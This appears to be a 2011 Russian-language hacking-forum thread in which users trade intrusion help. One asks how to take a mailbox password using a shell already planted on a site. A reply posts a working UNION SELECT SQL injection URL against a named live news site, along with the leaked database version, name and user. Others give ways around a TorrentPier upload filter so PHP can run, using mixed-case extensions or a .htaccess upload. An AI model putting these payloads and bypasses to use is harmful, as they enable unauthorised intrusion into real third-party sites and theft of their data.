 |
|
08.05.2011, 18:37
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от ZARO
Есть шелл на сайте, на сервере стоит SquirrelMail. Нужно узнать пароль от ящика, как это можно сделать?
В конфиге SquirrelMail должны быть данные для подключения к базе почтового сервера.
|
|
|
09.05.2011, 00:06
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
народ, очень интерисует скуль иньекция которая возникает при подстановки минуса например id=-1 почему так происходит? хто может показать исходники кода при котором получится такая ошибка, спасибо
|
|
|
|
09.05.2011, 00:48
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от qaz
народ, очень интерисует скуль иньекция которая возникает при подстановки минуса например id=-1 почему так происходит? хто может показать исходники кода при котором получится такая ошибка, спасибо
qez
подстановка твоего вопроса не очень таки правильна
если передать -1 параметру, который передается в запрос
например
SELECT username,password FROM users WHERE id=-1;
с синтаксисом ничего не случится, тока запрос зафелсится, для посика скулей использовать "-", не правильно )
|
|
|
|
09.05.2011, 00:51
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Tigger
Помотому что параметр обрабатывается intval()'ом или приводится к типу (int)$_GET['id'].
При id=-1 запрос получается SELECT text FROM posts WHERE id=-1
Что и вызывает ошибку.
ну да, такое тоже бывает, а вообще стандартизировать нельзя никак, кодеры все мыслят по своему, бог знает что они там пишут и что получается в конце, так что все зависит от ситуации
|
|
|
|
09.05.2011, 01:11
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Konqi
qez
подстановка твоего вопроса не очень таки правильна
если передать -1 параметру, который передается в запрос
например
SELECT username,password FROM users WHERE id=-1;
с синтаксисом ничего не случится, тока запрос зафелсится, для посика скулей использовать "-", не правильно )
ну например тут
http://felixonline.co.uk/print.php?article=-900
есть же ошибка, очень интересует исходный код етого запроса
и ещо одно
http://www.animeacademy.com/finalrevdisplay.php?id=34%27%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,user%28%29 ,19,20%20%20from%20%20AnimTest%20%20where%201%20=% 20%27
как вывести какуюнибуть инфу????
|
|
|
|
09.05.2011, 01:13
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от qaz
ну например тут
http://felixonline.co.uk/print.php?article=-900
есть же ошибка, очень интересует исходный код етого запроса
как вывести какуюнибуть инфу????
это ошибка не из за синтаксиса, просто запрос возвращает фелс, дальше фелс передается в функцию mysql_result(); и тот в свою очередь ругается
|
|
|
|
09.05.2011, 08:24
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
С нами:
9540826
Репутация:
479
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]attach_filename[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_php_'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]attach_filename[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
можно ли как-нибудь обойти?
phtml не работает. |
|
|
|
09.05.2011, 12:43
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от qaz
ну например тут
http://felixonline.co.uk/print.php?article=-900
есть же ошибка, очень интересует исходный код етого запроса
http://felixonline.co.uk/print.php?article=-900+union+select+concat_ws(0x3a,version(),database (),user(),@@version_compile_os),2+--+
5.0.90-log:media_felix:media_felix@localhostc-linux-gnu
Если не знаете, так не отвечайте.
|
|
|
|
09.05.2011, 12:47
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от #Wolf#
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]attach_filename[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_php_'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]attach_filename[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
можно ли как-нибудь обойти?
phtml не работает. str_replace чувствительная к регистру функция, соответственно рабочие варианты PHP, pHP, PHp, pHp.
Так же может сработать вариант залить .htaccess в котором указать нужное тебе расширение которое будет обрабатываться PHP интерпретатором.
Это если судить только по тому куску кода, что ты дал. Вполне вероятно, что $this->attach_filename принудительно переводить все символы в нижний регистр, а дальше по наклонной. В таком случае вариант с .htaccess должен сработать.
|
|
|
|
09.05.2011, 15:57
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
С нами:
9540826
Репутация:
479
|
|
Сообщение от Expl0ited
str_replace чувствительная к регистру функция, соответственно рабочие варианты PHP, pHP, PHp, pHp.
Так же может сработать вариант залить .htaccess в котором указать нужное тебе расширение которое будет обрабатываться PHP интерпретатором.
Это если судить только по тому куску кода, что ты дал. Вполне вероятно, что $this->attach_filename принудительно переводить все символы в нижний регистр, а дальше по наклонной. В таком случае вариант с .htaccess должен сработать.
Файлы с разным регистром заливает, но отдает их на скачивание. А если добавлять с тем же регистром расширение в allowlist, оно автоматом переводится в нижний.
C htaccess не сработает, перед файлом рандомный текст добавляется.
p.s. Движок TorrentPier
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
